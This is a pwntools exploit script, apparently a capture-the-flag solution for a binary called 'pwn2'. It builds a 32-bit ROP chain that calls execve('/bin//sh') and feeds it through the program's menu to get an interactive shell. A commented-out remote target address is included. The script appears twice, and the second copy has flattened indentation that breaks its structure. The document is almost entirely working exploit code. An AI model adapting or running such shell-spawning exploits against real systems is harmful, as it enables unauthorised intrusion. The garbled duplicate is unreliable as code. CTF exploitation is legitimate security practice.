esrever10/495_pwn2.py

## 495_pwn2.py
from pwn import *
from struct import pack

context(arch='i386', os='linux', log_level='debug')
p = ''
p += pack('<I', 0x0806ed0a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080bb406) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x080a1dad) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ed0a) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080bb406) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x080a1dad) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ed0a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054730) # xor eax, eax ; ret
p += pack('<I', 0x080a1dad) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x0806ed31) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080ea060) # padding without overwrite ebx
p += pack('<I', 0x0806ed0a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054730) # xor eax, eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x08049781) # int 0x80

pr = process('./pwn2')
#pr = remote('120.27.144.177',8000)
print len(p)
ret_offset = 56
#payload = '\0' * 56 + p
payload = ''
print pr.recv()
pr.sendline('60')
for i in range(16):
	print pr.recv()
	pr.sendline('2')
	pr.sendline('0')
	pr.sendline('0')
	payload += p32(0)
print '0~'
for i in range(0, 136, 4):
	print pr.recv()
	pr.sendline('1')
	pr.sendline(str(u32(p[i:i+4])))
	payload += p[i:i+4]
	pr.sendline('0')
print '1~'
print pr.recv()
pr.sendline('5')
print 'payload:', payload.encode('hex')
pr.interactive()
	from pwn import *
	from struct import pack

	context(arch='i386', os='linux', log_level='debug')
	p = ''
	p += pack('<I', 0x0806ed0a) # pop edx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x080bb406) # pop eax ; ret
	p += '/bin'
	p += pack('<I', 0x080a1dad) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806ed0a) # pop edx ; ret
	p += pack('<I', 0x080ea064) # @ .data + 4
	p += pack('<I', 0x080bb406) # pop eax ; ret
	p += '//sh'
	p += pack('<I', 0x080a1dad) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806ed0a) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x08054730) # xor eax, eax ; ret
	p += pack('<I', 0x080a1dad) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x080481c9) # pop ebx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x0806ed31) # pop ecx ; pop ebx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x080ea060) # padding without overwrite ebx
	p += pack('<I', 0x0806ed0a) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x08054730) # xor eax, eax ; ret
	p += pack('<I', 0x0807b75f) # inc eax ; ret
	p += pack('<I', 0x0807b75f) # inc eax ; ret
	p += pack('<I', 0x0807b75f) # inc eax ; ret
	p += pack('<I', 0x0807b75f) # inc eax ; ret
	p += pack('<I', 0x0807b75f) # inc eax ; ret
	p += pack('<I', 0x0807b75f) # inc eax ; ret
	p += pack('<I', 0x0807b75f) # inc eax ; ret
	p += pack('<I', 0x0807b75f) # inc eax ; ret
	p += pack('<I', 0x0807b75f) # inc eax ; ret
	p += pack('<I', 0x0807b75f) # inc eax ; ret
	p += pack('<I', 0x0807b75f) # inc eax ; ret
	p += pack('<I', 0x08049781) # int 0x80

	pr = process('./pwn2')
	#pr = remote('120.27.144.177',8000)
	print len(p)
	ret_offset = 56
	#payload = '\0' * 56 + p
	payload = ''
	print pr.recv()
	pr.sendline('60')
	for i in range(16):
	print pr.recv()
	pr.sendline('2')
	pr.sendline('0')
	pr.sendline('0')
	payload += p32(0)
	print '0~'
	for i in range(0, 136, 4):
	print pr.recv()
	pr.sendline('1')
	pr.sendline(str(u32(p[i:i+4])))
	payload += p[i:i+4]
	pr.sendline('0')
	print '1~'
	print pr.recv()
	pr.sendline('5')
	print 'payload:', payload.encode('hex')
	pr.interactive()